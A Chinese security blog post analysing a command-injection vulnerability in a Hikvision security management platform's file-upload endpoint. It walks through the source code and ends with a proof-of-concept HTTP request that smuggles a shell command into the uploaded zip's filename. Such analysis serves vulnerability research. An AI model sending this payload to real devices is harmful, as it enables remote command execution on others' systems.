[代码审计]海康productFile命令执行历史漏洞分析(含poc)

于 2024-07-30 10:59:32 发布
阅读量527 收藏 14
点赞数 16
文章标签: 安全 web安全 java 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LiangYueSec/article/details/140789729
版权

如果觉得该文章有帮助的,麻烦师傅们可以搜索下微信公众号:良月安全。点个关注,感谢师傅们的支持。

免责声明

本号所发布的所有内容,包括但不限于信息、工具、项目以及文章,均旨在提供学习与研究之用。所有工具安全性自测。如因此产生的一切不良后果与文章作者和本公众号无关。如有涉及公司与个人敏感信息,侵权烦请告知,我们会立即删除并致歉。

前言

首先是之前在某漏洞库上看到海康威视-综合安防管理平台 /svm/api/v1/productFile 路径存在任意文件上传,因为刚好有源码就想着去看下,起初以为是zip解压缩目录穿越造成的文件写入,后来发现是拼接命令造成命令执行,比较有意思,已经有其他大佬发过分析文章了,这里只是简单记录下,大佬勿喷。

代码分析

首先根据漏洞路径定位到代码位置。

除了上传文件外还必须要传入2个参数type和ip。

进入productFileUpload方法查看代码逻辑,首先校验Token请求头。

不通过直接抛出异常。

这里这个Token请求头可以配合另一个漏洞来获取,这里直接看文件上传方法resolverUploadMultipartFile,首先判断上传的文件后缀是不是.zip,如果不是直接抛出异常。

如果上传的文件后缀是.zip文件的话,会先调用FileResolver.transferTo。

在FileResolver.transferTo方法中,先获取/opt/hikvision/web/components/svm.1/data/temp目录,如果这个目录不存在的话会创建。

然后因为传入的rename为true,所以保存的文件名前面会加上uuid,最终保存的文件路径就是/opt/hikvision/web/components/svm.1/data/temp/uuid_xxxx.zip,FileResolver.transferTo返回保存文件的路径。

回到resolverUploadMultipartFile方法,执行完FileResolver.transferTo且没异常抛出后,会调用ZipFacade.unzip方法来解压上传的zip文件。

这里传入的参数CommonCache.ZIP_TOOL_PATH是7za文件的路径。

fileAbsuolutePath就是保存的文件路径,ZipFacade.unzip方法中首先检查7za和上传的文件是否存在, 然后获取去掉上传的文件扩展名后的路径,作为解压后的目标目录,如果不存在则创建。

最后构建并执行解压命令,这里可以发现这个命令是拼接的,类似于

"7za" x "/opt/hikvision/web/components/svm.1/data/temp/uuid_xxxx.zip" -o"/opt/hikvision/web/components/svm.1/data/temp/uuid_xxxx" -y

而类似于这段命令中,xxxx是我们可控的,就是上传zip文件的名字,这里就可以利用linux中的内联执行来执行系统命令了。所以文件名可以构造为`ping xxx.dnslog.cn`.zip来达到命令执行。

漏洞POC

token需要通过另一个接口获取。

POST /svm/api/v1/productFile?type=product&ip=127.0.0.1&agentNo=1 HTTP/1.1
Host: 
Token: SElLIElnVTBzNVd6eWlibVB4M046dUE0SlBBbGJTWGNMUnk5aWg4dkJXL2RjeEdqKys4aTd0cHBMM09INytVZz0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary =---------------------------142851345723692939351758052805
Content-Length: 346

-----------------------------142851345723692939351758052805
Content-Disposition: form-data; name="file"; filename="`ping xxx.dnslog.cn`.zip"
Content-Type: application/zip

123
-----------------------------142851345723692939351758052805--
LiangYueSec
关注
  • 16
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
海康linux 命令,海康摄像机命令
weixin_28308325的博客
04-30 1876
BusyBox v1.2.1 Protect Shell (psh) ver: MT-1494accessDvrSwitchatclearExcepcloseIRISdbgGuidebugCmddebugDspdebugLogdecStatdialPowerCtrldisableHBdisableWatchdogdmesgdspStatusenable3GOSDenableHBenableWatc...
海康sdk对于历史数据下载、告警相关的代码
09-23
在“海康sdk对于历史数据下载、告警相关的代码”这一主题中,我们将深入探讨如何利用SDK来处理历史录像的下载和告警事件。 首先,历史数据下载主要涉及到录像回放功能。SDK通常会提供一系列的接口用于检索设备上的...
0day新接口-海康威视综合安防管理平台register命令执行漏洞
weixin_43167326的博客
06-06 697
海康威视部分综合安防管理平台管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。
1day海康威视综合安防管理平台多个RCE远程代码执行漏洞
weixin_43167326的博客
06-11 1111
海康威视部分综合安防管理平台管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。
0day海康威视综合安防管理平台 applyAutoLoginTicket 远程代码执行漏洞
weixin_43167326的博客
06-07 745
海康威视部分综合安防管理平台管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。
海康摄像头CVE-2021-36260漏洞复现
heike_Ch的博客
06-25 803
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
python 调用海康SDK 控制摄像头云台代码
09-30
在操作过程中,应始终检查返回值,以确保命令成功执行。遇到错误时,根据错误码进行相应的处理。最后,记得使用`DisconnectDevice`函数断开与设备的连接。 7. **camTracker_python_native**: 这个文件名可能是...
海康摄像机Python版SDK编程指南.rar
05-09
开发者可以通过查阅此文档了解如何与海康摄像头通信,如何发送命令,获取视频流等。 2. **示例代码**:通常SDK会包一些示例代码,展示如何初始化设备、打开视频流、控制摄像头运动等基本操作,这对于初学者来说是...
海康设备SDK及文档(体温).rar
07-14
海康设备SDK及文档,包32位和64位,需要复制到文件所在目录。为后端设备(嵌入式网络硬盘录像机、视频服务器)、前端设备(网络摄像机、网络球机、IP模块)等产品服务的配套模块,用于远程访问和控制设备软件的二...
海康编码数据分析
08-22
"海康编码数据分析库"专注于处理来自海康设备的视频数据,将其解析为H264帧数据,这是一项核心的技术应用。H264,也称为MPEG-4 Part 10或AVC(Advanced Video Coding),是一种广泛使用的高效视频压缩标准,能够以较...
构建稳固与安全的网络环境:从微软蓝屏事件中的教训学习
xingyu_qie的专栏
07-22 813
微软蓝屏”事件为我们提供了宝贵的教训和警示,即使是最大的科技公司也难以完全避免软件缺陷带来的灾难性后果。建设一个稳固和安全的网络环境需要多方面的努力:从有效的软件更新管理到强化的紧急响应能力,再到全员安全意识的培养和文化建设。只有综合运用技术、流程和人员培训,我们才能更好地应对未来可能出现的类似挑战,保护我们的数字基础设施和社会运行的稳定性与安全性。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1208
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
如何安全的申请SSL证书
2401_86337938的博客
07-22 1438
DV级别的证书只验证域名所有权,OV级别证书除了验证域名所有权外还会验证单位组织信息,EV级别的证书除了验证域名所有权、单位组织信息外还会验证详细组织业务信息。一旦你的证书被批准,你会收到一个包证书文件的邮件。最后,在选择SSL证书时,也要注意选择受信任的可信根CA颁布的SSL证书,可以先向JoySSL官网工作人员发送自己需要保护的域名,提交自己所需要的证书类型,注册时填写。首先选择在授权的JoySSL提供商或者是受信任的证书颁发机构选择适合的证书类型。详细的公司信息验证,用于银行、电商等敏感行业。
哪个邮箱最安全最好用啊
Zoho_Mail的博客
07-23 1300
Zoho企业邮箱,采用加密技术、反垃圾邮件和病毒保护,支持多因素认证,确保数据安全合规,同时提供易用性集成和移动应用。对公司,电子邮件可能带上商业计划、顾客信息、财务报表等保密信息,泄露可能导致竞争者掌握,危害企业的竞争优势与信誉。邮件炸弹进攻:很多垃圾短信的涌入可能导致邮箱服务器负荷,危害工作邮件的接收和推送,进而影响业务运作。登陆凭据、医疗记录、专利等敏感信息,一旦泄露,可能对个人或企业导致不可逆转的伤害。遵守国际安全标准和法规,如GDPR、HIPAA等,保证用户数据的合法处理和保护。
轮换IP:网络安全的隐形守护者
最新发布
m0_56836821的博客
07-25 644
代理服务器会为每次请求分配不同的IP地址,使得目标服务器看到的是代理服务器的IP地址不是用户的真实IP地址。总的来说,轮换IP是一项重要的网络安全技术,它通过定期更换用户的网络地址来保护用户的隐私和安全。希望通过本文的介绍,大家能够对轮换IP有更深入的了解,并在实际应用中充分利用这项技术,提升自身的网络安全和隐私保护水平。这样,用户的真实IP地址就被隐藏起来,显示的是代理服务器或VPN的IP地址。轮换IP是一种通过定期更换用户的IP地址来防止用户在互联网上的活动被追踪或识别的技术。
大语言模型(LLM)安全测评基准V1.0 发布版下载
cybtec的博客
07-25 818
大语言模型(LLM)安全测评基准V1.0 发布版下载
网站被浏览器提示“不安全”,如何解决
ABCDEFK1234的博客
07-24 457
网站被浏览器提示“不安全”,如何解决
第123天:内网安全-域防火墙&入站出站规则&不出网隧道上线&组策略对象同步
weixin_71529930的博客
07-22 884
因为浏览器走的协议是http协议,而ping协议走的是icmp协议,所以隧道的思路就是把tcp协议利用icmp等等别的协议进行出网转发。限制了tcp协议,但是这些协议是向下兼容的,限制了tcp,也并非就限制了网络层以下类似icmp等协议。首先先生成一个msf木马,生成的时候把地址设置为127.0.0.1,反弹给自己的3333端口。这样也只是禁用了一个端口,假如别人用的是4444端口,这里尝试修改禁止所有端口出站。而出站是自己主动的去访问别人,windows防火墙出站默认是允许的。
网络安全之初始访问阶段攻防手段(三)
子非渔
07-25 1016
初始访问阶段攻防手段(SEIM、NDR、EDR、XDR、SOC、态势感知、僵木蠕、DNS、NETFLOW、DDOS、WAF、防火墙、日志审计)以及使用场景。
海康综合安防管理平台漏洞
02-28
很抱歉,我不能提供关于海康综合安防管理平台漏洞的信息。我是一个AI助手,我不能提供关于漏洞的详细信息或者攻击方法。如果您对海康综合安防管理平台的安全性有疑问或者发现了潜在的漏洞,建议您及时联系海康威视公司或者相关安全团队进行报告和咨询。他们将能够提供专业的帮助和支持。 如果您有其他关于网络安全、软件开发或者其他技术方面的问题,我会很乐意为您解答。请告诉我您还有其他问题吗?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值